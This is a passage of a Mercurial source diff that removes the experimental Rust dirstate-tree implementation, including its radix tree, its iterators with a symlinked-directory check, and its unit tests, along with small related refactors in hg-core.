b/rust/hg-core/src/dirstate/dirs_multiset.rs @@ -30,7 +30,6 @@ /// Initializes the multiset from a dirstate. /// /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(not(feature = "dirstate-tree"))] pub fn from_dirstate( dirstate: &StateMap, skip_state: Option<EntryState>, @@ -51,30 +50,6 @@ Ok(multiset) } - /// Initializes the multiset from a dirstate. - /// - /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(feature = "dirstate-tree")] - pub fn from_dirstate( - dirstate: &StateMap, - skip_state: Option<EntryState>, - ) -> Result<Self, DirstateMapError> { - let mut multiset = DirsMultiset { - inner: FastHashMap::default(), - }; - for (filename, DirstateEntry { state, .. }) in dirstate.iter() { - // This `if` is optimized out of the loop - if let Some(skip) = skip_state { - if skip != state { - multiset.add_path(filename)?; - } - } else { - multiset.add_path(filename)?; - } - } - - Ok(multiset) - } /// Initializes the multiset from a manifest. pub fn from_manifest( diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -5,7 +5,8 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::revlog::node::NULL_NODE_ID; +use crate::errors::HgError; +use crate::revlog::node::NULL_NODE; use crate::{ dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT}, pack_dirstate, parse_dirstate, @@ -14,7 +15,7 @@ hg_path::{HgPath, HgPathBuf}, }, CopyMap, DirsMultiset, DirstateEntry, DirstateError, DirstateMapError, - DirstateParents, DirstateParseError, FastHashMap, StateMap, + DirstateParents, FastHashMap, StateMap, }; use micro_timer::timed; use std::collections::HashSet; @@ -72,8 +73,8 @@ self.non_normal_set = None; self.other_parent_set = None; self.set_parents(&DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }) } @@ -253,7 +254,6 @@ ) } - #[cfg(not(feature = "dirstate-tree"))] pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { if !force && self.non_normal_set.is_some() @@ -282,34 +282,6 @@ self.non_normal_set = Some(non_normal); self.other_parent_set = Some(other_parent); } - #[cfg(feature = "dirstate-tree")] - pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { - if !force - && self.non_normal_set.is_some() - && self.other_parent_set.is_some() - { - return; - } - let mut non_normal = HashSet::new(); - let mut other_parent = HashSet::new(); - - for ( - filename, - DirstateEntry { - state, size, mtime, .. - }, - ) in self.state_map.iter() - { - if state != EntryState::Normal || mtime == MTIME_UNSET { - non_normal.insert(filename.to_owned()); - } - if state == EntryState::Normal && size == SIZE_FROM_OTHER_PARENT { - other_parent.insert(filename.to_owned()); - } - } - self.non_normal_set = Some(non_normal); - self.other_parent_set = Some(other_parent); - } /// Both of these setters and their uses appear to be the simplest way to /// emulate a Python lazy property, but it is ugly and unidiomatic. @@ -366,11 +338,13 @@ }; } else if file_contents.is_empty() { parents = DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }; } else { - return Err(DirstateError::Parse(DirstateParseError::Damaged)); + return Err( + HgError::corrupted("Dirstate appears to be damaged").into() + ); } self.parents = Some(parents); @@ -383,10 +357,10 @@ } #[timed] - pub fn read( + pub fn read<'a>( &mut self, - file_contents: &[u8], - ) -> Result<Option<DirstateParents>, DirstateError> { + file_contents: &'a [u8], + ) -> Result<Option<&'a DirstateParents>, DirstateError> { if file_contents.is_empty() { return Ok(None); } @@ -423,7 +397,6 @@ self.set_non_normal_other_parent_entries(true); Ok(packed) } - #[cfg(not(feature = "dirstate-tree"))] pub fn build_file_fold_map(&mut self) -> &FileFoldMap { if let Some(ref file_fold_map) = self.file_fold_map { return file_fold_map; @@ -439,22 +412,6 @@ self.file_fold_map = Some(new_file_fold_map); self.file_fold_map.as_ref().unwrap() } - #[cfg(feature = "dirstate-tree")] - pub fn build_file_fold_map(&mut self) -> &FileFoldMap { - if let Some(ref file_fold_map) = self.file_fold_map { - return file_fold_map; - } - let mut new_file_fold_map = FileFoldMap::default(); - - for (filename, DirstateEntry { state, .. }) in self.state_map.iter() { - if state != EntryState::Removed { - new_file_fold_map - .insert(normalize_case(&filename), filename.to_owned()); - } - } - self.file_fold_map = Some(new_file_fold_map); - self.file_fold_map.as_ref().unwrap() - } } #[cfg(test)] diff --git a/rust/hg-core/src/dirstate/dirstate_tree.rs b/rust/hg-core/src/dirstate/dirstate_tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree.rs +++ /dev/null @@ -1,14 +0,0 @@ -// dirstate_tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -//! Special-case radix tree that matches a filesystem hierarchy for use in the -//! dirstate. -//! It has not been optimized at all yet. - -pub mod iter; -pub mod node; -pub mod tree; diff --git a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs b/rust/hg-core/src/dirstate/dirstate_tree/iter.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs +++ /dev/null @@ -1,392 +0,0 @@ -// iter.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::node::{Node, NodeKind}; -use super::tree::Tree; -use crate::dirstate::dirstate_tree::node::Directory; -use crate::dirstate::status::Dispatch; -use crate::utils::hg_path::{hg_path_to_path_buf, HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::borrow::Cow; -use std::collections::VecDeque; -use std::iter::{FromIterator, FusedIterator}; -use std::path::PathBuf; - -impl FromIterator<(HgPathBuf, DirstateEntry)> for Tree { - fn from_iter<T: IntoIterator<Item = (HgPathBuf, DirstateEntry)>>( - iter: T, - ) -> Self { - let mut tree = Self::new(); - for (path, entry) in iter { - tree.insert(path, entry); - } - tree - } -} - -/// Iterator of all entries in the dirstate tree. -/// -/// It has no particular ordering. -pub struct Iter<'a> { - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, -} - -impl<'a> Iter<'a> { - pub fn new(node: &'a Node) -> Iter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { to_visit } - } -} - -impl<'a> Iterator for Iter<'a> { - type Item = (HgPathBuf, DirstateEntry); - - fn next(&mut self) -> Option<Self::Item> { - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - } - None - } -} - -impl<'a> FusedIterator for Iter<'a> {} - -/// Iterator of all entries in the dirstate tree, with a special filesystem -/// handling for the directories containing said entries. -/// -/// It checks every directory on-disk to see if it has become a symlink, to -/// prevent a potential security issue. -/// Using this information, it may dispatch `status` information early: it -/// returns canonical paths along with `Shortcut`s, which are either a -/// `DirstateEntry` or a `Dispatch`, if the fate of said path has already been -/// determined. -/// -/// Like `Iter`, it has no particular ordering. -pub struct FsIter<'a> { - root_dir: PathBuf, - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, - shortcuts: VecDeque<(HgPathBuf, StatusShortcut)>, -} - -impl<'a> FsIter<'a> { - pub fn new(node: &'a Node, root_dir: PathBuf) -> FsIter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { - root_dir, - to_visit, - shortcuts: Default::default(), - } - } - - /// Mercurial tracks symlinks but *not* what they point to. - /// If a directory is moved and symlinked: - /// - /// ```bash - /// $ mkdir foo - /// $ touch foo/a - /// $ # commit... - /// $ mv foo bar - /// $ ln -s bar foo - /// ``` - /// We need to dispatch the new symlink as `Unknown` and all the - /// descendents of the directory it replace as `Deleted`. - fn dispatch_symlinked_directory( - &mut self, - path: impl AsRef<HgPath>, - node: &Node, - ) { - let path = path.as_ref(); - self.shortcuts.push_back(( - path.to_owned(), - StatusShortcut::Dispatch(Dispatch::Unknown), - )); - for (file, _) in node.iter() { - self.shortcuts.push_back(( - path.join(&file), - StatusShortcut::Dispatch(Dispatch::Deleted), - )); - } - } - - /// Returns `true` if the canonical `path` of a directory corresponds to a - /// symlink on disk. It means it was moved and symlinked after the last - /// dirstate update. - /// - /// # Special cases - /// - /// Returns `false` for the repository root. - /// Returns `false` on io error, error handling is outside of the iterator. - fn directory_became_symlink(&mut self, path: &HgPath) -> bool { - if path.is_empty() { - return false; - } - let filename_as_path = match hg_path_to_path_buf(&path) { - Ok(p) => p, - _ => return false, - }; - let meta = self.root_dir.join(filename_as_path).symlink_metadata(); - match meta { - Ok(ref m) if m.file_type().is_symlink() => true, - _ => false, - } - } -} - -/// Returned by `FsIter`, since the `Dispatch` of any given entry may already -/// be determined during the iteration. This is necessary for performance -/// reasons, since hierarchical information is needed to `Dispatch` an entire -/// subtree efficiently. -#[derive(Debug, Copy, Clone)] -pub enum StatusShortcut { - /// A entry in the dirstate for further inspection - Entry(DirstateEntry), - /// The result of the status of the corresponding file - Dispatch(Dispatch), -} - -impl<'a> Iterator for FsIter<'a> { - type Item = (HgPathBuf, StatusShortcut); - - fn next(&mut self) -> Option<Self::Item> { - // If any paths have already been `Dispatch`-ed, return them - if let Some(res) = self.shortcuts.pop_front() { - return Some(res); - } - - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - let canonical_path = HgPath::new(&base_path); - if self.directory_became_symlink(canonical_path) { - // Potential security issue, don't do a normal - // traversal, force the results. - self.dispatch_symlinked_directory( - canonical_path, - &node, - ); - continue; - } - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - } - - None - } -} - -impl<'a> FusedIterator for FsIter<'a> {} - -fn join_path<'a, 'b>(path: &'a [u8], other: &'b [u8]) -> Cow<'b, [u8]> { - if path.is_empty() { - other.into() - } else { - [path, &b"/"[..], other].concat().into() - } -} - -/// Adds all children of a given directory `dir` to the visit queue `to_visit` -/// prefixed by a `base_path`. -fn add_children_to_visit<'a>( - to_visit: &mut VecDeque<(Cow<'a, [u8]>, &'a Node)>, - base_path: &[u8], - dir: &'a Directory, -) { - to_visit.extend(dir.children.iter().map(|(path, child)| { - let full_path = join_path(&base_path, &path); - (full_path, child) - })); -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::utils::hg_path::HgPath; - use crate::{EntryState, FastHashMap}; - use std::collections::HashSet; - - #[test] - fn test_iteration() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bar"), - DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo2"), - DirstateEntry { - state: EntryState::Merged, - mode: 40, - mtime: 41, - size: 42, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/baz"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!(tree.len(), 4); - - let results: HashSet<_> = - tree.iter().map(|(c, _)| c.to_owned()).collect(); - dbg!(&results); - assert!(results.contains(HgPath::new(b"foo2"))); - assert!(results.contains(HgPath::new(b"foo/bar"))); - assert!(results.contains(HgPath::new(b"foo/baz"))); - assert!(results.contains(HgPath::new(b"foo/bap/nested"))); - - let mut iter = tree.iter(); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert_eq!(None, iter.next()); - assert_eq!(None, iter.next()); - drop(iter); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"foo2"))); - assert!(results.contains_key(HgPath::new(b"foo/bar"))); - assert!(results.contains_key(HgPath::new(b"foo/baz"))); - // Is a dir but `was_file`, so it's listed as a removed file - assert!(results.contains_key(HgPath::new(b"foo/bap/nested"))); - assert!(results.contains_key(HgPath::new(b"foo/bap/nested/a"))); - - // insert removed file (now directory) after nested file - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - // `insert` returns `None` for a directory - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"a"))); - assert!(results.contains_key(HgPath::new(b"a/a"))); - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/node.rs b/rust/hg-core/src/dirstate/dirstate_tree/node.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/node.rs +++ /dev/null @@ -1,398 +0,0 @@ -// node.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use crate::utils::hg_path::HgPathBuf; -use crate::{DirstateEntry, EntryState, FastHashMap}; - -/// Represents a filesystem directory in the dirstate tree -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Directory { - /// Contains the old file information if it existed between changesets. - /// Happens if a file `foo` is marked as removed, removed from the - /// filesystem then a directory `foo` is created and at least one of its - /// descendents is added to Mercurial. - pub(super) was_file: Option<Box<File>>, - pub(super) children: FastHashMap<Vec<u8>, Node>, -} - -/// Represents a filesystem file (or symlink) in the dirstate tree -#[derive(Debug, Clone, PartialEq)] -pub struct File { - /// Contains the old structure if it existed between changesets. - /// Happens all descendents of `foo` marked as removed and removed from - /// the filesystem, then a file `foo` is created and added to Mercurial. - pub(super) was_directory: Option<Box<Directory>>, - pub(super) entry: DirstateEntry, -} - -#[derive(Debug, Clone, PartialEq)] -pub enum NodeKind { - Directory(Directory), - File(File), -} - -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Node { - pub kind: NodeKind, -} - -impl Default for NodeKind { - fn default() -> Self { - NodeKind::Directory(Default::default()) - } -} - -impl Node { - pub fn insert( - &mut self, - path: &[u8], - new_entry: DirstateEntry, - ) -> InsertResult { - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next().unwrap_or(b""); - let tail = split.next().unwrap_or(b""); - - // Are we're modifying the current file ? Is the the end of the path ? - let is_current_file = tail.is_empty() && head.is_empty(); - - // Potentially Replace the current file with a directory if it's marked - // as `Removed` - if !is_current_file { - if let NodeKind::File(file) = &mut self.kind { - if file.entry.state == EntryState::Removed { - self.kind = NodeKind::Directory(Directory { - was_file: Some(Box::from(file.clone())), - children: Default::default(), - }) - } - } - } - match &mut self.kind { - NodeKind::Directory(directory) => { - Node::insert_in_directory(directory, new_entry, head, tail) - } - NodeKind::File(file) => { - if is_current_file { - let new = Self { - kind: NodeKind::File(File { - entry: new_entry, - ..file.clone() - }), - }; - InsertResult { - did_insert: false, - old_entry: Some(std::mem::replace(self, new)), - } - } else { - match file.entry.state { - EntryState::Removed => { - unreachable!("Removed file turning into a directory was dealt with earlier") - } - _ => { - Node::insert_in_file( - file, new_entry, head, tail, - ) - } - } - } - } - } - } - - /// The current file still exists and is not marked as `Removed`. - /// Insert the entry in its `was_directory`. - fn insert_in_file( - file: &mut File, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - if let Some(d) = &mut file.was_directory { - Node::insert_in_directory(d, new_entry, head, tail) - } else { - let mut dir = Directory { - was_file: None, - children: FastHashMap::default(), - }; - let res = - Node::insert_in_directory(&mut dir, new_entry, head, tail); - file.was_directory = Some(Box::new(dir)); - res - } - } - - /// Insert an entry in the subtree of `directory` - fn insert_in_directory( - directory: &mut Directory, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - let mut res = InsertResult::default(); - - if let Some(node) = directory.children.get_mut(head) { - // Node exists - match &mut node.kind { - NodeKind::Directory(subdir) => { - if tail.is_empty() { - let becomes_file = Self { - kind: NodeKind::File(File { - was_directory: Some(Box::from(subdir.clone())), - entry: new_entry, - }), - }; - let old_entry = directory - .children - .insert(head.to_owned(), becomes_file); - return InsertResult { - did_insert: true, - old_entry, - }; - } else { - res = node.insert(tail, new_entry); - } - } - NodeKind::File(_) => { - res = node.insert(tail, new_entry); - } - } - } else if tail.is_empty() { - // File does not already exist - directory.children.insert( - head.to_owned(), - Self { - kind: NodeKind::File(File { - was_directory: None, - entry: new_entry, - }), - }, - ); - res.did_insert = true; - } else { - // Directory does not already exist - let mut nested = Self { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }; - res = nested.insert(tail, new_entry); - directory.children.insert(head.to_owned(), nested); - } - res - } - - /// Removes an entry from the tree, returns a `RemoveResult`. - pub fn remove(&mut self, path: &[u8]) -> RemoveResult { - let empty_result = RemoveResult::default(); - if path.is_empty() { - return empty_result; - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return empty_result; - } - Some(h) => h, - }; - if head == path { - match &mut self.kind { - NodeKind::Directory(d) => { - return Node::remove_from_directory(head, d); - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - let RemoveResult { old_entry, .. } = - Node::remove_from_directory(head, d); - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - } - empty_result - } else { - // Look into the dirs - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - let mut res = child.remove(tail); - if res.cleanup { - d.children.remove(head); - } - res.cleanup = - d.children.is_empty() && d.was_file.is_none(); - res - } else { - empty_result - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - let RemoveResult { cleanup, old_entry } = - child.remove(tail); - if cleanup { - d.children.remove(head); - } - if d.children.is_empty() && d.was_file.is_none() { - f.was_directory = None; - } - - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - empty_result - } - } - } - } - - fn remove_from_directory(head: &[u8], d: &mut Directory) -> RemoveResult { - if let Some(node) = d.children.get_mut(head) { - return match &mut node.kind { - NodeKind::Directory(d) => { - if let Some(f) = &mut d.was_file { - let entry = f.entry; - d.was_file = None; - RemoveResult { - cleanup: false, - old_entry: Some(entry), - } - } else { - RemoveResult::default() - } - } - NodeKind::File(f) => { - let entry = f.entry; - let mut cleanup = false; - match &f.was_directory { - None => { - if d.children.len() == 1 { - cleanup = true; - } - d.children.remove(head); - } - Some(dir) => { - node.kind = NodeKind::Directory(*dir.clone()); - } - } - - RemoveResult { - cleanup, - old_entry: Some(entry), - } - } - }; - } - RemoveResult::default() - } - - pub fn get(&self, path: &[u8]) -> Option<&Node> { - if path.is_empty() { - return Some(&self); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&self); - } - Some(h) => h, - }; - match &self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &f.was_directory { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - } - } - - None - } - - pub fn get_mut(&mut self, path: &[u8]) -> Option<&mut NodeKind> { - if path.is_empty() { - return Some(&mut self.kind); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&mut self.kind); - } - Some(h) => h, - }; - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - } - } - - None - } - - pub fn iter(&self) -> Iter { - Iter::new(self) - } -} - -/// Information returned to the caller of an `insert` operation for integrity. -#[derive(Debug, Default)] -pub struct InsertResult { - /// Whether the insertion resulted in an actual insertion and not an - /// update - pub(super) did_insert: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<Node>, -} - -/// Information returned to the caller of a `remove` operation integrity. -#[derive(Debug, Default)] -pub struct RemoveResult { - /// If the caller needs to remove the current node - pub(super) cleanup: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<DirstateEntry>, -} - -impl<'a> IntoIterator for &'a Node { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs b/rust/hg-core/src/dirstate/dirstate_tree/tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs +++ /dev/null @@ -1,682 +0,0 @@ -// tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use super::node::{Directory, Node, NodeKind}; -use crate::dirstate::dirstate_tree::iter::FsIter; -use crate::dirstate::dirstate_tree::node::{InsertResult, RemoveResult}; -use crate::utils::hg_path::{HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::path::PathBuf; - -/// A specialized tree to represent the Mercurial dirstate. -/// -/// # Advantages over a flat structure -/// -/// The dirstate is inherently hierarchical, since it's a representation of the -/// file structure of the project. The current dirstate format is flat, and -/// while that affords us potentially great (unordered) iteration speeds, the -/// need to retrieve a given path is great enough that you need some kind of -/// hashmap or tree in a lot of cases anyway. -/// -/// Going with a tree allows us to be smarter: -/// - Skipping an ignored directory means we don't visit its entire subtree -/// - Security auditing does not need to reconstruct paths backwards to check -/// for symlinked directories, this can be done during the iteration in a -/// very efficient fashion -/// - We don't need to build the directory information in another struct, -/// simplifying the code a lot, reducing the memory footprint and -/// potentially going faster depending on the implementation. -/// - We can use it to store a (platform-dependent) caching mechanism [1] -/// - And probably other types of optimizations. -/// -/// Only the first two items in this list are implemented as of this commit. -/// -/// [1]: https://www.mercurial-scm.org/wiki/DirsCachePlan -/// -/// -/// # Structure -/// -/// It's a prefix (radix) tree with no fixed arity, with a granularity of a -/// folder, allowing it to mimic a filesystem hierarchy: -/// -/// ```text -/// foo/bar -/// foo/baz -/// test -/// ``` -/// Will be represented (simplified) by: -/// -/// ```text -/// Directory(root): -/// - File("test") -/// - Directory("foo"): -/// - File("bar") -/// - File("baz") -/// ``` -/// -/// Moreover, it is special-cased for storing the dirstate and as such handles -/// cases that a simple `HashMap` would handle, but while preserving the -/// hierarchy. -/// For example: -/// -/// ```shell -/// $ touch foo -/// $ hg add foo -/// $ hg commit -m "foo" -/// $ hg remove foo -/// $ rm foo -/// $ mkdir foo -/// $ touch foo/a -/// $ hg add foo/a -/// $ hg status -/// R foo -/// A foo/a -/// ``` -/// To represent this in a tree, one needs to keep track of whether any given -/// file was a directory and whether any given directory was a file at the last -/// dirstate update. This tree stores that information, but only in the right -/// circumstances by respecting the high-level rules that prevent nonsensical -/// structures to exist: -/// - a file can only be added as a child of another file if the latter is -/// marked as `Removed` -/// - a file cannot replace a folder unless all its descendents are removed -/// -/// This second rule is not checked by the tree for performance reasons, and -/// because high-level logic already prevents that state from happening. -/// -/// # Ordering -/// -/// It makes no guarantee of ordering for now. -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Tree { - pub root: Node, - files_count: usize, -} - -impl Tree { - pub fn new() -> Self { - Self { - root: Node { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }, - files_count: 0, - } - } - - /// How many files (not directories) are stored in the tree, including ones - /// marked as `Removed`. - pub fn len(&self) -> usize { - self.files_count - } - - pub fn is_empty(&self) -> bool { - self.len() == 0 - } - - /// Inserts a file in the tree and returns the previous entry if any. - pub fn insert( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<DirstateEntry> { - let old = self.insert_node(path, kind); - match old?.kind { - NodeKind::Directory(_) => None, - NodeKind::File(f) => Some(f.entry), - } - } - - /// Low-level insertion method that returns the previous node (directories - /// included). - fn insert_node( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<Node> { - let InsertResult { - did_insert, - old_entry, - } = self.root.insert(path.as_ref().as_bytes(), kind); - self.files_count += if did_insert { 1 } else { 0 }; - old_entry - } - - /// Returns a reference to a node if it exists. - pub fn get_node(&self, path: impl AsRef<HgPath>) -> Option<&Node> { - self.root.get(path.as_ref().as_bytes()) - } - - /// Returns a reference to the entry corresponding to `path` if it exists. - pub fn get(&self, path: impl AsRef<HgPath>) -> Option<&DirstateEntry> { - if let Some(node) = self.get_node(&path) { - return match &node.kind { - NodeKind::Directory(d) => { - d.was_file.as_ref().map(|f| &f.entry) - } - NodeKind::File(f) => Some(&f.entry), - }; - } - None - } - - /// Returns `true` if an entry is found for the given `path`. - pub fn contains_key(&self, path: impl AsRef<HgPath>) -> bool { - self.get(path).is_some() - } - - /// Returns a mutable reference to the entry corresponding to `path` if it - /// exists. - pub fn get_mut( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<&mut DirstateEntry> { - if let Some(kind) = self.root.get_mut(path.as_ref().as_bytes()) { - return match kind { - NodeKind::Directory(d) => { - d.was_file.as_mut().map(|f| &mut f.entry) - } - NodeKind::File(f) => Some(&mut f.entry), - }; - } - None - } - - /// Returns an iterator over the paths and corresponding entries in the - /// tree. - pub fn iter(&self) -> Iter { - Iter::new(&self.root) - } - - /// Returns an iterator of all entries in the tree, with a special - /// filesystem handling for the directories containing said entries. See - /// the documentation of `FsIter` for more. - pub fn fs_iter(&self, root_dir: PathBuf) -> FsIter { - FsIter::new(&self.root, root_dir) - } - - /// Remove the entry at `path` and returns it, if it exists. - pub fn remove( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<DirstateEntry> { - let RemoveResult { old_entry, .. } = - self.root.remove(path.as_ref().as_bytes()); - self.files_count = self - .files_count - .checked_sub(if old_entry.is_some() { 1 } else { 0 }) - .expect("removed too many files"); - old_entry - } -} - -impl<P: AsRef<HgPath>> Extend<(P, DirstateEntry)> for Tree { - fn extend<T: IntoIterator<Item = (P, DirstateEntry)>>(&mut self, iter: T) { - for (path, entry) in iter { - self.insert(path, entry); - } - } -} - -impl<'a> IntoIterator for &'a Tree { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::dirstate::dirstate_tree::node::File; - use crate::{EntryState, FastHashMap}; - use pretty_assertions::assert_eq; - - impl Node { - /// Shortcut for getting children of a node in tests. - fn children(&self) -> Option<&FastHashMap<Vec<u8>, Node>> { - match &self.kind { - NodeKind::Directory(d) => Some(&d.children), - NodeKind::File(_) => None, - } - } - } - - #[test] - fn test_dirstate_tree() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert_node( - HgPath::new(b"we/p"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0 - } - ), - None - ); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"we")).is_some()); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo/bar"), entry), None); - assert_eq!( - tree.get_node(HgPath::new(b"foo/bar")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }) - }) - ); - // We didn't override the first entry we made - assert!(tree.get_node(HgPath::new(b"we")).is_some(),); - // Inserting the same key again - assert_eq!( - tree.insert_node(HgPath::new(b"foo/bar"), entry), - Some(Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }), - }) - ); - // Inserting the two levels deep - assert_eq!(tree.insert_node(HgPath::new(b"foo/bar/baz"), entry), None); - // Getting a file "inside a file" should return `None` - assert_eq!(tree.get_node(HgPath::new(b"foo/bar/baz/bap"),), None); - - assert_eq!( - tree.insert_node(HgPath::new(b"wasdir/subfile"), entry), - None, - ); - let removed_entry = DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - }; - assert!(tree - .insert_node(HgPath::new(b"wasdir"), removed_entry) - .is_some()); - - assert_eq!( - tree.get_node(HgPath::new(b"wasdir")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: Some(Box::new(Directory { - was_file: None, - children: [( - b"subfile".to_vec(), - Node { - kind: NodeKind::File(File { - was_directory: None, - entry, - }) - } - )] - 